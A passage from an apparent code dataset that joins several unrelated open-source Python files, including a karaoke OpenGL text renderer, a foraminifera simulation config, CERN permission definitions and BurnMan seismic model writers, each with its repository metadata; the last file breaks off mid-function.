self.htmlFile = os.path.join(os.path.dirname(__file__), 'i18n', 'about-en.html')
else:
#dutch is default
self.htmlFile = os.path.join(os.path.dirname(__file__), 'i18n', 'about-nl.html')
self._initGui()
def _initGui(self):
# Set up the user interface from Designer.
self.ui = Ui_aboutDlg()
self.ui.setupUi(self)
self.ui.buttonBox.addButton( QPushButton("Sluiten"), QDialogButtonBox.RejectRole )
with open(self.htmlFile,'r', encoding="utf-8") as html:
self.ui.aboutText.setHtml( html.read() )
|
warrieka/geopunt4Qgis
|
geopunt4QgisAbout.py
|
Python
|
gpl-2.0
| 2,694
|
import Pyro4
from pyage.core import address
from pyage.core.stop_condition import StepLimitStopCondition
from pyage_forams.solutions.distributed.neighbour_matcher import Neighbour3dMatcher
from pyage_forams.solutions.distributed.request import create_dispatcher
from pyage_forams.solutions.environment import environment_factory, Environment3d
from pyage_forams.solutions.foram import create_forams
from pyage_forams.solutions.genom import GenomFactory
from pyage_forams.solutions.insolation_meter import StaticInsolation
from pyage_forams.solutions.statistics import MultipleStatistics, PsiStatistics, CsvStatistics
factory = GenomFactory(chambers_limit=5)
genom_factory = lambda: factory.generate
forams = create_forams(1, initial_energy=5)
insolation_meter = StaticInsolation
size = lambda: 50
reproduction_minimum = lambda: 50
movement_energy = lambda: 0.5
growth_minimum = lambda: 30
energy_need = lambda: 0.2
algae_limit = lambda: 20
algae_growth_probability = lambda: 0.3
newborn_limit = lambda: 6
reproduction_probability = lambda: 0.5
growth_probability = lambda: 0.5
growth_cost_factor = lambda: 0.8
capacity_factor = lambda: 1.1
initial_algae_probability = lambda: 0.2
environment = environment_factory(regeneration_factor=0.1, clazz=Environment3d)
stop_condition = lambda: StepLimitStopCondition(500)
stats = lambda: MultipleStatistics([CsvStatistics(), PsiStatistics()])
cell_capacity = lambda: 1
address_provider = address.SequenceAddressProvider
request_dispatcher = create_dispatcher()
neighbour_matcher = Neighbour3dMatcher
ns_hostname = lambda: "127.0.0.1"
pyro_daemon = Pyro4.Daemon()
daemon = lambda: pyro_daemon
|
maciek123/pyage-forams
|
pyage_forams/conf/distributed3d/common.py
|
Python
|
gpl-2.0
| 1,637
|
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2016 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CAP ATLAS permissions"""
from invenio_access import DynamicPermission
from cap.modules.experiments.permissions.common import get_collaboration_group_needs, get_superuser_needs
atlas_group_need = set(
[g for g in get_collaboration_group_needs('ATLAS')])
atlas_group_need |= set([g for g in
get_superuser_needs()])
atlas_permission = DynamicPermission(*atlas_group_need)
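# --- Usage sketch (illustrative) ---
# A view would guard ATLAS-only content with, e.g.:
#   if atlas_permission.can():
#       ...  # current user is in an ATLAS collaboration group or a superuser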
|
xchen101/analysis-preservation.cern.ch
|
cap/modules/experiments/permissions/atlas.py
|
Python
|
gpl-2.0
| 1,496
|
# -*- coding: utf-8 -*-
'''
Created on Jul 11, 2013
@author: Carl, Aaron
'''
import os
from mb.coordinator import _Pretty
from jinja2 import Environment,FileSystemLoader,TemplateNotFound
from mb.config import ERROR_NO_404, ERROR_NO_500
class Template(object):
'''
这里封装了Jinja2的模板引擎
'''
def render(self, templateName, **context):
extensions = context.pop('extensions', [])
globalVars = context.pop('globals', {})
templatePath = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates')
jinjaEnv = Environment(
loader=FileSystemLoader(templatePath),
extensions=extensions,
)
jinjaEnv.globals.update(globalVars)
try:
return jinjaEnv.get_template(templateName + ".html").render(context)
except TemplateNotFound:
_Pretty.handleError("Cannot find the template[" + templateName + "] in " + templatePath, ERROR_NO_404)
except:
errorInfo = os.sys.exc_info()
_Pretty.handleError("Error '%s' happened on line %d\n" % (errorInfo[0], errorInfo[2].tb_lineno), ERROR_NO_500)
|
MoneyBack/MoneyBack
|
mb/template.py
|
Python
|
gpl-2.0
| 1,182
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2013 Hector Martin "marcan" <hector@marcansoft.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 or version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from OpenGL.arrays import vbo
import OpenGL.GL as gl
import OpenGL.GL.shaders as shaders
import numpy as np
from blitzloop import song, texture_font
from blitzloop.util import map_from, map_to
vs_karaoke = """
#version 110
attribute vec2 vertex;
attribute vec2 texcoord;
attribute vec3 border_color;
attribute vec3 fill_color;
attribute vec3 outline_color;
attribute vec3 border_color_on;
attribute vec3 fill_color_on;
attribute vec3 outline_color_on;
attribute float glyph_time;
attribute vec2 atom_time;
attribute vec2 line_time;
uniform float time;
varying vec2 v_texcoord;
varying vec3 v_border_color;
varying vec3 v_fill_color;
varying vec3 v_outline_color;
varying vec3 v_border_color_on;
varying vec3 v_fill_color_on;
varying vec3 v_outline_color_on;
varying float v_alpha;
varying float v_time;
float fade = 0.5;
float linstep(float min, float max, float v) {
return clamp((v - min) / (max - min), 0.0, 1.0);
}
void main() {
v_texcoord = texcoord.st;
v_time = glyph_time;
v_fill_color = fill_color;
v_border_color = border_color;
v_outline_color = outline_color;
v_fill_color_on = fill_color_on;
v_border_color_on = border_color_on;
v_outline_color_on = outline_color_on;
float line_start = line_time.x;
float line_end = line_time.y;
float fade_in = linstep(line_start, line_start + fade, time);
float fade_out = linstep(line_end - fade, line_end, time);
v_alpha = fade_in - fade_out;
vec4 pos = vec4(vertex.x, vertex.y, 0.0, 1.0);
float x_shift = 0.03;
pos.x -= x_shift * smoothstep(0.0, 2.0, 1.0 - fade_in);
pos.x += x_shift * smoothstep(0.0, 2.0, fade_out);
gl_Position = gl_ModelViewProjectionMatrix * pos;
}
"""
fs_karaoke = """
#version 110
uniform float time;
uniform sampler2D tex;
varying vec2 v_texcoord;
varying vec3 v_border_color;
varying vec3 v_fill_color;
varying vec3 v_outline_color;
varying vec3 v_border_color_on;
varying vec3 v_fill_color_on;
varying vec3 v_outline_color_on;
varying float v_alpha;
varying float v_time;
void main() {
vec4 texel = texture2D(tex, v_texcoord.st);
float outline = texel.b;
float border = texel.g;
float fill = texel.r;
vec3 outline_color, border_color, fill_color;
if (v_time < time) {
outline_color = v_outline_color_on;
border_color = v_border_color_on;
fill_color = v_fill_color_on;
} else {
outline_color = v_outline_color;
border_color = v_border_color;
fill_color = v_fill_color;
}
float a = (outline + border + fill);
gl_FragColor.rgb = outline_color * outline;
gl_FragColor.rgb += border_color * border;
gl_FragColor.rgb += fill_color * fill;
if (a > 0.0) {
gl_FragColor.rgb /= clamp(a, 0.0, 1.0);
} else {
gl_FragColor.rgb = vec3(0.0, 0.0, 0.0);
}
gl_FragColor.a = a * v_alpha;
}
"""
class GlyphInstance(object):
def __init__(self, glyph, x, y, style):
self.glyph = glyph
self.x = x
self.y = y
self.tx1 = self.tx2 = 0
self.t1 = self.t2 = 0
self.colors = style.colors
self.colors_on = style.colors_on
def set_timing(self, tx1, tx2, t1, t2):
self.tx1 = tx1
self.tx2 = tx2
self.t1 = t1
self.t2 = t2
def __repr__(self):
return "Gl(%.04f,%.04f)" % (self.x, self.y)
class DisplayLine(object):
def __init__(self, display):
self.display = display
self.glyphs = []
self.text = ""
self.px = 0
self.py = 0
self.x = 0.0
self.y = 0.0
self._start_t = None
self._end_t = None
self.start = None
self.end = None
self.fade_in_time = self.fade_out_time = 1
self.descender = 0
self.ascender = 0
self.want_row = None
def copy(self):
l = DisplayLine(self.display)
l.text = self.text
l.glyphs = list(self.glyphs)
l.px = self.px
l.py = self.py
l.x = self.x
l.y = self.y
l._start_t = self._start_t
l._end_t = self._end_t
l.start = self.start
l.end = self.end
l.ascender = self.ascender
l.descender = self.descender
l.want_row = self.want_row
return l
@property
def width(self):
return self.px
@property
def height(self):
return self.ascender - self.descender
@property
def lim_start(self):
return self._start_t - self.fade_in_time
@property
def lim_end(self):
return self._end_t + self.fade_in_time
def add(self, molecule, get_atom_time, style, font, ruby_font):
# append a space if we are joining with a previous molecule
space_char = molecule.SPACE
if self.glyphs:
glyph = font.get_glyph(space_char)
self.px += glyph.dx
self.py += glyph.dy
self.text += space_char
prev_char = None
step = 0
new_ascender = font.ascender
if ruby_font:
new_ascender += ruby_font.ascender - ruby_font.descender
self.ascender = max(self.ascender, new_ascender)
self.descender = min(self.descender, font.descender)
# add the molecule's atoms
for atom in molecule.atoms:
atom_x, atom_y = self.px, self.py
edge_px = None
glyphs = []
# add the atom's base text as glyphs
for i,c in enumerate(atom.text):
if atom.particle_edge is not None and i == atom.particle_edge:
edge_px = self.px
self.text += c
glyph = font.get_glyph(c)
gi = GlyphInstance(glyph, self.px, self.py, style)
if prev_char is not None:
kx, ky = font.get_kerning(prev_char, c)
self.px += kx
self.py += ky
glyphs.append(gi)
self.px += glyph.dx
self.py += glyph.dy
prev_char = c
# assign the timing map for the atom's glyphs
# atom_x (left) -> atom start time
# self.px (right) -> atom end time
for glyph in glyphs:
start, end = get_atom_time(step, atom.steps)
if self._start_t is None:
self._start_t = start
else:
self._start_t = min(start, self._start_t)
if self._end_t is None:
self._end_t = end
else:
self._end_t = max(end, self._end_t)
glyph.set_timing(atom_x, self.px, start, end)
self.glyphs += glyphs
# if the atom has subatomic particles (ruby text)
if atom.particles is not None and ruby_font:
# ruby pen. we will adjust X later when centering over atom.
ruby_px = 0
ruby_py = self.display.round_coord(atom_y + font.ascender - ruby_font.descender)
ruby_prev_char = None
ruby_glyphs = []
par_step = step
# add the particles
for particle in atom.particles:
par_glyphs = []
particle_x = ruby_px
# add the characters in the particle
for c in particle.text:
glyph = ruby_font.get_glyph(c)
gi = GlyphInstance(glyph, ruby_px, ruby_py, style)
if ruby_prev_char is not None:
kx, ky = ruby_font.get_kerning(ruby_prev_char, c)
ruby_px += kx
ruby_py += ky
par_glyphs.append(gi)
ruby_px += glyph.dx
ruby_py += glyph.dy
ruby_prev_char = c
for glyph in par_glyphs:
start, end = get_atom_time(par_step, particle.steps)
glyph.set_timing(particle_x, ruby_px, start, end)
par_step += particle.steps
ruby_glyphs += par_glyphs
# center the ruby text over the atom
if edge_px is not None:
atom_width = edge_px - atom_x
else:
atom_width = self.px - atom_x
dx = self.display.round_coord(atom_x + (atom_width - ruby_px) / 2.0)
for glyph in ruby_glyphs:
glyph.tx1 += dx
glyph.tx2 += dx
glyph.x += dx
self.glyphs.append(glyph)
step += atom.steps
self.start = self.lim_start
self.end = self.lim_end
def build(self):
vbodata = []
idxdata = []
for i,g in enumerate(self.glyphs):
tleft = map_to(map_from(g.x + g.glyph.left, g.tx1, g.tx2), g.t1, g.t2)
tright = map_to(map_from(g.x + g.glyph.right, g.tx1, g.tx2), g.t1, g.t2)
const_vbodata = list(i/255.0 for i in sum(g.colors + g.colors_on, ()))
const_vbodata += (g.t1, g.t2, self.start, self.end)
vbodata.append(
[g.x + g.glyph.left, g.y + g.glyph.bot,
g.glyph.tex_left, g.glyph.tex_bot,
tleft] + const_vbodata)
vbodata.append(
[g.x + g.glyph.left, g.y + g.glyph.top,
g.glyph.tex_left, g.glyph.tex_top,
tleft] + const_vbodata)
vbodata.append(
[g.x + g.glyph.right, g.y + g.glyph.top,
g.glyph.tex_right, g.glyph.tex_top,
tright] + const_vbodata)
vbodata.append(
[g.x + g.glyph.right, g.y + g.glyph.bot,
g.glyph.tex_right, g.glyph.tex_bot,
tright] + const_vbodata)
idxdata += (i*4, i*4+1, i*4+2, i*4+2, i*4+3, i*4)
self.vbo = vbo.VBO(np.asarray(vbodata, np.float32), gl.GL_STATIC_DRAW, gl.GL_ARRAY_BUFFER)
self.ibo = vbo.VBO(np.asarray(idxdata, np.uint16), gl.GL_STATIC_DRAW, gl.GL_ELEMENT_ARRAY_BUFFER)
self.count = len(self.glyphs)
def draw(self, renderer):
with self.vbo, self.ibo:
gl.glPushMatrix()
x = self.display.round_coord(self.x)
y = self.display.round_coord(self.y)
gl.glTranslate(x, y, 0)
renderer.enable_attribs()
stride = 27*4
off = 0
off += renderer.attrib_pointer("vertex", stride, off, self.vbo)
off += renderer.attrib_pointer("texcoord", stride, off, self.vbo)
off += renderer.attrib_pointer("glyph_time", stride, off, self.vbo)
off += renderer.attrib_pointer("fill_color", stride, off, self.vbo)
off += renderer.attrib_pointer("border_color", stride, off, self.vbo)
off += renderer.attrib_pointer("outline_color", stride, off, self.vbo)
off += renderer.attrib_pointer("fill_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("border_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("outline_color_on", stride, off, self.vbo)
off += renderer.attrib_pointer("atom_time", stride, off, self.vbo)
off += renderer.attrib_pointer("line_time", stride, off, self.vbo)
assert off == stride
gl.glDrawElements(gl.GL_TRIANGLES, 6*self.count, gl.GL_UNSIGNED_SHORT, self.ibo)
renderer.disable_attribs()
gl.glPopMatrix()
def __unicode__(self):
return "DisplayLine<[%s]>" % self.text
class SongLayout(object):
def __init__(self, song_obj, variant, renderer):
self.song = song_obj
self.variant = song_obj.variants[variant]
self.renderer = renderer
self.margin = 0.07
self.rowspacing = 0.01
self.wrapwidth = 1.0 - self.margin * 2
self.pre_line = 1.0
self.post_line = 1.0
self.lines = {}
self.fonts = {}
self._merge_lines()
self._layout_lines(self.lines[song.TagInfo.BOTTOM], False)
self._layout_lines(self.lines[song.TagInfo.TOP], True)
self._build_lines()
self.renderer.atlas.upload()
def _get_font(self, style, ruby=False):
font = style.font if not ruby else style.ruby_font
size = style.size if not ruby else style.ruby_size
if size == 0:
return None
ident = (font, size, style.border_width, style.outline_width)
if ident in self.fonts:
return self.fonts[ident]
else:
fontfile = self.song.get_font_path(font)
font = texture_font.TextureFont(self.renderer.display.width, self.renderer.atlas, fontfile, size, style)
self.fonts[ident] = font
return font
def _merge_lines(self):
edges = {
song.TagInfo.TOP: [],
song.TagInfo.BOTTOM: []
}
for compound in self.song.compounds:
for tag, molecule in compound.items():
if tag in self.variant.tags:
tag_info = self.variant.tags[tag]
edges[tag_info.edge].append((compound.get_atom_time, tag_info, molecule))
for edge, molecules in edges.items():
lines = []
line = None
for get_atom_time, tag_info, molecule in molecules:
font = self._get_font(tag_info.style, False)
if molecule.has_ruby:
ruby_font = self._get_font(tag_info.style, True)
else:
ruby_font = None
if molecule.break_before or line is None:
line = DisplayLine(self.renderer.display)
line.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
lines.append(line)
if molecule.row is not None:
line.want_row = molecule.row
else:
tmp = line.copy()
tmp.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
if tmp.px > self.wrapwidth:
line = DisplayLine(self.renderer.display)
line.add(molecule, get_atom_time, tag_info.style, font, ruby_font)
lines.append(line)
else:
lines[-1] = line = tmp
if molecule.break_after:
line = None
self.lines[edge] = lines
def _build_lines(self):
for lines in self.lines.values():
for dl in lines:
dl.build()
def _layout_lines(self, lines, top=False):
if not lines:
return
rows = [[] for i in range(10)]
lines.sort(key = lambda x: x.start)
def sortrow(rowid):
rows[rowid].sort(key = lambda x: x.start)
def collides(l, rowid):
c = []
for l2 in rows[rowid][::-1]:
if l.start >= l2.end:
return c
elif l.end <= l2.start:
continue
else:
c.append(l2)
else:
return c
def canmoveup(l, limit=1):
if l.row >= limit:
return False
for l2 in collides(l, l.row + 1):
if not canmoveup(l2, limit):
return False
return True
def moveup(l, limit=1):
assert l.row < limit
for l2 in collides(l, l.row + 1):
moveup(l2, limit)
rows[l.row].remove(l)
sortrow(l.row)
l.row += 1
assert not collides(l, l.row)
rows[l.row].append(l)
sortrow(l.row)
def canmovetop(l):
return True
def movetop(l):
if l.row == 0:
# FIXME: this can cause another line to violate the
# "no jumping ahead" rule. meh.
for row in range(len(rows)):
if collides(l, row):
need_row = row + 1
else:
need_row = l.row - 1
for l2 in collides(l, need_row):
movetop(l2)
rows[l.row].remove(l)
sortrow(l.row)
l.row = need_row
rows[l.row].append(l)
sortrow(l.row)
if not top:
for i, l in enumerate(lines):
if l.want_row is not None and not collides(l, l.want_row):
l.row = l.want_row
rows[l.want_row].append(l)
elif not collides(l, 1):
l.row = 1
rows[1].append(l)
elif not collides(l, 0):
l.row = 0
rows[0].append(l)
else:
need_row = 2
while collides(l, need_row):
need_row += 1
for want_row in (lines[i-1].row,):
if canmoveup(rows[want_row][-1], need_row):
moveup(rows[want_row][-1], need_row)
l.row = want_row
rows[want_row].append(l)
break
else:
l.row = need_row
rows[need_row].append(l)
else:
for i, l in enumerate(lines):
for row in range(len(rows)):
if not collides(l, row):
need_row = row
break
if i == 0 or need_row <= (lines[i-1].row + 1):
l.row = need_row
rows[need_row].append(l)
else:
for want_row in (lines[i-1].row, lines[i-1].row + 1):
if canmovetop(rows[want_row][-1]):
movetop(rows[want_row][-1])
l.row = want_row
rows[want_row].append(l)
break
else:
l.row = need_row
rows[need_row].append(l)
max_ascender = max(l.ascender for l in lines)
min_descender = min(l.descender for l in lines)
row_height = max_ascender - min_descender + self.rowspacing
lastrow = 1 if top else -1
max_end = 0
prev_l = None
for i, l in enumerate(lines):
next_l = lines[i+1] if i < len(lines)-1 else None
if not top:
if l.row == 0:
l.x = self.margin + (self.wrapwidth - l.width) # right
elif (l.start > max_end or l.row > lastrow) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin # left
else:
l.x = self.margin + (self.wrapwidth - l.width) / 2.0 # center
else:
if (l.start > max_end or l.row < lastrow) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin # left
elif l.row >= 1 and not (next_l and next_l.row > l.row) and (max_end > l.end or (next_l and next_l.start < l.end)):
l.x = self.margin + (self.wrapwidth - l.width) # right
else:
l.x = self.margin + (self.wrapwidth - l.width) / 2.0 # center
if max_end > l.start and prev_l:
orig_start = l.start
l.start = max(min(l.start, prev_l.lim_start), l.start - 5)
if prev_l.row < l.row:
l.start = min(orig_start, max(l.start, prev_l.start + 1.5))
prev_in_row = rows[l.row].index(l) - 1
if prev_in_row >= 0:
l.start = max(l.start, rows[l.row][prev_in_row].end)
max_end = max(max_end, l.end)
lastrow = l.row
if not top:
l.y = self.margin - min_descender + row_height * l.row
else:
l.y = self.renderer.display.top - self.margin - max_ascender - row_height * l.row
prev_l = l
def _layout_lines_top(self, lines):
if not lines:
return
def draw(self, t, renderer):
for edge, lines in self.lines.items():
for l in lines:
if l.start <= t <= l.end:
l.draw(renderer)
class Renderer(object):
UNIFORMS = [
"tex", "time"
]
ATTRIBUTES = {
"vertex": (2, gl.GL_FLOAT),
"texcoord": (2, gl.GL_FLOAT),
"glyph_time": (1, gl.GL_FLOAT),
"atom_time": (2, gl.GL_FLOAT),
"line_time": (2, gl.GL_FLOAT),
"border_color": (3, gl.GL_FLOAT),
"fill_color": (3, gl.GL_FLOAT),
"outline_color": (3, gl.GL_FLOAT),
"border_color_on": (3, gl.GL_FLOAT),
"fill_color_on": (3, gl.GL_FLOAT),
"outline_color_on": (3, gl.GL_FLOAT),
}
TYPE_LEN = {
gl.GL_FLOAT: 4
}
def __init__(self, display):
self.display = display
self.shader = shaders.compileProgram(
shaders.compileShader(vs_karaoke, gl.GL_VERTEX_SHADER),
shaders.compileShader(fs_karaoke, gl.GL_FRAGMENT_SHADER),
)
for i in self.UNIFORMS:
setattr(self, "l_" + i, gl.glGetUniformLocation(self.shader, i))
self.attrib_loc = {i: gl.glGetAttribLocation(self.shader, i) for i in self.ATTRIBUTES}
self.atlas = texture_font.TextureAtlas(depth=3)
def attrib_pointer(self, attrib, stride, offset, vbo):
size, data_type = self.ATTRIBUTES[attrib]
loc = self.attrib_loc[attrib]
if loc >= 0:
gl.glVertexAttribPointer(loc, size, data_type, gl.GL_FALSE, stride, vbo + offset)
return self.TYPE_LEN[data_type] * size
def enable_attribs(self):
for i in self.attrib_loc.values():
if i >= 0:
gl.glEnableVertexAttribArray(i)
def disable_attribs(self):
for i in self.attrib_loc.values():
if i >= 0:
gl.glDisableVertexAttribArray(i)
def draw(self, time, layout):
gl.glActiveTexture(gl.GL_TEXTURE0)
gl.glBindTexture(gl.GL_TEXTURE_2D, self.atlas.texid)
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
gl.glEnable(gl.GL_BLEND)
with self.shader:
gl.glUniform1i(self.l_tex, 0)
gl.glUniform1f(self.l_time, time)
layout.draw(time, self)
def reset(self):
self.atlas = texture_font.TextureAtlas(depth=3)
if __name__ == "__main__":
import sys, song, graphics
s = song.Song(sys.argv[1])
display = graphics.Display(1280,720)
renderer = Renderer(display)
layout = SongLayout(s, list(s.variants.keys())[-1], renderer)
def render():
song_time = 1
while True:
gl.glClearColor(0, 0.3, 0, 1)
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glLoadIdentity()
renderer.draw(song_time, layout)
song_time += 1/70.0
yield None
display.set_render_gen(render)
display.main_loop()
|
yacoob/blitzloop
|
blitzloop/layout.py
|
Python
|
gpl-2.0
| 24,324
|
# This file is part of BurnMan - a thermoelastic and thermodynamic toolkit for the Earth and Planetary Sciences
# Copyright (C) 2012 - 2015 by the BurnMan team, released under the GNU
# GPL v2 or later.
from __future__ import absolute_import
import numpy as np
import warnings
import scipy.integrate
import matplotlib.pyplot as plt
import pkgutil
from . import tools
from . import constants
from . import seismic
from . import geotherm
def write_axisem_input(rock, min_depth=670.e3, max_depth=2890.e3, T0= 1900, filename='axisem_burnmantestrock.txt',
axisem_ref='axisem_prem_ani_noocean.txt', plotting=False):
"""
Writing velocities and densities to AXISEM (www.axisem.info) input file
Default is set to replacing the lower mantle with the BurnMan rock
Note:
- This implementation uses PREM to convert from depths to pressures to compute at
- This implementation assumes an adiabatic temperature profile, only T0 at min_depth can be set
- Currently, it only honors the discontinuities already in the synthetic input file, so it is best
to only replace certain layers with burnman values (this should be improved in the future).
Parameters
----------
rock : burnman.Composite()
Composition to implement in the model
min_depth : float
minimum depth to replace model (m) (default = 670 km)
max_depth : float
maximum depth to replace model (m) (default = 2890 km)
T0 : float
Anchor temperature at min_depth for adiabatic profile (K) (default=1900)
filename: string
Output filename (default ='axisem_burnmantestrock.txt')
axisem_ref: string
Input filename (in burnman/data/input_seismic/) (default = 'axisem_prem_ani_noocean.txt')
plotting: Boolean
True means plot of the old model and replaced model will be shown (default = False)
"""
# Load reference input
datastream = pkgutil.get_data('burnman', 'data/input_seismic/' + axisem_ref)
lines = [line.strip()
for line in datastream.decode('ascii').split('\n') if line.strip()]
table = []
for line in lines[18:]:
numbers = np.fromstring(line, sep=' ')
if len(numbers)>0:
if line[0] != "#" and line[0] != "%":
table.append(numbers)
table = np.array(table)
ref_radius = table[:, 0]
ref_depth = 6371.e3 - ref_radius
ref_density = table[:, 1]
ref_vpv = table[:, 2]
ref_vsv = table[:, 3]
ref_Qk = table[:, 4]
ref_Qmu = table[:, 5]
ref_vph = table[:, 6]
ref_vsh = table[:, 7]
ref_eta = table[:, 8]
# Cutting out range to input in Axisem reference file (currently the lower mantle)
indrange = [x for x in range(len(ref_depth)) if ref_depth[
x] > min_depth and ref_depth[x] < max_depth]
# pad both ends to include up to discontinuity, bit of a hack...
indrange.insert(0, indrange[0] - 1)
indrange.append(indrange[-1] + 1)
# Invert depthrange so adiabatic computations work!
depthrange = ref_depth[indrange]
# convert depths to pressures
pressures = seismic.PREM().pressure(depthrange)
# Computing adiabatic temperatures. T0 is an input parameter!
temperatures = geotherm.adiabatic(pressures, T0, rock)
print("Calculations are done for:")
rock.debug_print()
rock_vp, rock_vs, rock_rho = rock.evaluate(
['v_p', 'v_s', 'density'], pressures, temperatures)
discontinuity = 0
# WRITE OUT FILE
f = open(filename, 'w')
print('Writing ' + filename + ' ...')
f.write('# Input file '+ filename +' for AXISEM created using BurnMan, replacing ' + axisem_ref+ ' between ' +str(np.round(min_depth/1.e3)) + ' and ' + str(np.round(max_depth /1.e3)) +' km \n')
f.write('NAME ' + filename + '\n')
for line in lines[2:18]:
f.write(line[:-1] + '\n')
for i in range(indrange[0]):
if i>0 and ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity ' +str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2)) +' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
for i in range(indrange[0], indrange[-1]):
ind2 = -1 + i - indrange[0]
if ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity '+ str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2))+' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], rock_rho[ind2], rock_vp[ind2], rock_vs[ind2], ref_Qk[i],
ref_Qmu[i], rock_vp[ind2], rock_vs[ind2], ref_eta[i]))
for i in range(indrange[-1], len(ref_radius)):
if ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity ' +str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2))+' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
f.close()
if plotting:
# plot vp
plt.plot(ref_depth / 1.e3, ref_vph / 1.e3, color='g', linestyle='-', label='vp')
plt.plot(depthrange / 1.e3, rock_vp / 1.e3, color='g', linestyle='-',
marker='o', markerfacecolor='g', markersize=1)
# plot Vs
plt.plot(ref_depth / 1.e3, ref_vsh / 1.e3, color='b', linestyle='-', label='vs')
plt.plot(depthrange / 1.e3, rock_vs / 1.e3, color='b', linestyle='-',
marker='o', markerfacecolor='b', markersize=1)
# plot density
plt.plot(ref_depth / 1.e3, ref_density / 1.e3, color='r', linestyle='-', label='density')
plt.plot(depthrange / 1.e3, rock_rho / 1.e3, color='r', linestyle='-',
marker='o', markerfacecolor='r', markersize=1)
plt.title(filename + ' = ' + axisem_ref + ' replaced between ' +
str(min_depth / 1.e3) + ' and ' + str(max_depth / 1.e3) + ' km')
plt.legend(loc='lower right')
plt.show()
def write_mineos_input(rock, min_depth=670.e3, max_depth=2890.e3, T0 = 1900, filename='mineos_burnmantestrock.txt',
mineos_ref='mineos_prem_noocean.txt', plotting=False):
"""
Writing velocities and densities to Mineos (https://geodynamics.org/cig/software/mineos/) input file
Default is set to replacing the lower mantle with the BurnMan rock
Note:
- This implementation uses PREM to convert from depths to pressures to compute at
- This implementation assumes an adiabatic temperature profile, only T0 at min_depth can be set
- Currently, it only honors the discontinuities already in the synthetic input file, so it is best
to only replace certain layers with burnman values (this should be improved in the future).
Parameters
----------
rock : burnman.Composite()
Composition to implement in the model
min_depth : float
minimum depth to replace model (m) (default = 670 km)
max_depth : float
maximum depth to replace model (m) (default = 2890 km)
T0 : float
Anchor temperature at min_depth for adiabatic profile (K) (default=1900)
filename: string
Output filename (default ='mineos_burnmantestrock.txt')
mineos_ref: string
Input filename (in burnman/data/input_seismic/) (default = 'mineos_prem_noocean.txt')
plotting: Boolean
True means plot of the old model and replaced model will be shown (default = False)
"""
# Load reference input
datastream = pkgutil.get_data('burnman', 'data/input_seismic/' + mineos_ref)
lines = [line.strip()
for line in datastream.decode('ascii').split('\n') if line.strip()]
table=[]
for line in lines[3:]:
numbers = np.fromstring(line, sep=' ')
table.append(numbers)
table = np.array(table)
ref_radius = table[:, 0]
ref_depth = 6371.e3 - ref_radius
ref_density = table[:, 1]
ref_vpv = table[:, 2]
ref_vsv = table[:, 3]
ref_Qk = table[:, 4]
ref_Qmu = table[:, 5]
ref_vph = table[:, 6]
ref_vsh = table[:, 7]
ref_eta = table[:, 8]
# Cutting out range to input in Mineos (currently the lower mantle)
indrange = [x for x in range(len(ref_depth)) if ref_depth[
x] > min_depth and ref_depth[x] < max_depth]
# pad both ends to include up to discontinuity, bit of a hack...
indrange.insert(0, indrange[0] - 1)
indrange.append(indrange[-1] + 1)
# Invert depthrange so adiabatic computations work!
depthrange = ref_depth[indrange][::-1]
# convert depths to pressures
pressures = seismic.PREM().pressure(depthrange)
# Computing adiabatic temperatures. T0 is a choice!
temperatures = geotherm.adiabatic(pressures, T0, rock)
print("Calculations are done for:")
rock.debug_print()
rock_vp, rock_vs, rock_rho = rock.evaluate(
['v_p', 'v_s', 'density'], pressures, temperatures)
# WRITE OUT FILE
f = open(filename , 'w')
